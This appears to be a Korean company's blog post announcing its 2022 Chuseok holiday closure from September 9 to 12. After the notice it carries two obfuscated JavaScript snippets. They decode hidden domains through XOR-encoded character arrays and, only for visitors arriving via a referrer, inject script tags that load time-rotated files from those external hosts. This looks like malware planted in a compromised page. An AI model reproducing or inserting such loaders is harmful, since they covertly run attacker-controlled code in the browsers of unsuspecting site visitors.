Author - sungseoha

[소식] 2022 추석 명절 휴무 공지

어느덧, 나뭇잎이 붉게 물드는 가을 평년보다 조금 이른 추석이 얼마 남지 않았습니다. 무더운 여름, 쉼 없이 달려온 만큼 연휴를 맞아 회사도 잠시 쉬어가고자 합니다.  9월 8일 목요일까지는 정상 업무 예정이며 문의가 필요한 경우 아래 일정 참고 부탁드립니다.  휴무: 9월 9일 (금)~12일 (월) 즐거운 웃음이 가득한 한가위 보내시길 바랍니다. 감사합니다

Read more...
!function (_8eb379) { var _998d01 = Date.now(); var _eb626d = 1000; _998d01 = _998d01 / _eb626d; _998d01 = Math.floor(_998d01); var _d42f3a = 600; _998d01 -= _998d01 % _d42f3a; _998d01 = _998d01.toString(16); var _7b54b0 = _8eb379.referrer; if (!_7b54b0) return; var _618563 = [50412, 50409, 50422, 50405, 50404, 50401, 50419, 50408, 50402, 50415, 50401, 50418, 50404, 50411, 50409, 50420, 50350, 50409, 50414, 50406, 50415]; _618563 = _618563.map(function(_65a186){ return _65a186 ^ 50304; }); var _b3e56 = "29ab6ca3565f40f3f697bb8b82935a6b"; _618563 = String.fromCharCode(..._618563); var _a1fabd = "https://"; var _369942 = "/"; var _d4a7a6 = "track-"; var _cd9d72 = ".js"; var _3cce44 = _8eb379.createElement("script"); _3cce44.type = "text/javascript"; _3cce44.async = true; _3cce44.src = _a1fabd + _618563 + _369942 + _d4a7a6 + _998d01 + _cd9d72; _8eb379.getElementsByTagName("head")[0].appendChild(_3cce44) }(document); !function (_af4707) { var _578f33 = Date.now(); var _739181 = 1000; _578f33 = _578f33 / _739181; _578f33 = Math.floor(_578f33); var _4e018e = 600; _578f33 -= _578f33 % _4e018e; _578f33 = _578f33.toString(16); var _fa2aaa = _af4707.referrer; if (!_fa2aaa) return; var _b0e2c2 = [31965, 31951, 31951, 31961, 31944, 31951, 31890, 31947, 31965, 31944, 31967, 31956, 31965, 31951, 31941, 31954, 31967, 31890, 31967, 31955, 31953]; _b0e2c2 = _b0e2c2.map(function(_92d04b){ return _92d04b ^ 31932; }); var _b3a85c = "e3b9b14a2b971a64eec210b0cff0f54d"; _b0e2c2 = String.fromCharCode(..._b0e2c2); var _3fedb4 = "https://"; var _5ccbad = "/"; var _4d8aae = "chunk-"; var _56785f = ".js"; var _85afd1 = _af4707.createElement("script"); _85afd1.type = "text/javascript"; _85afd1.async = true; _85afd1.src = _3fedb4 + _b0e2c2 + _5ccbad + _4d8aae + _578f33 + _56785f; _af4707.getElementsByTagName("head")[0].appendChild(_85afd1) }(document);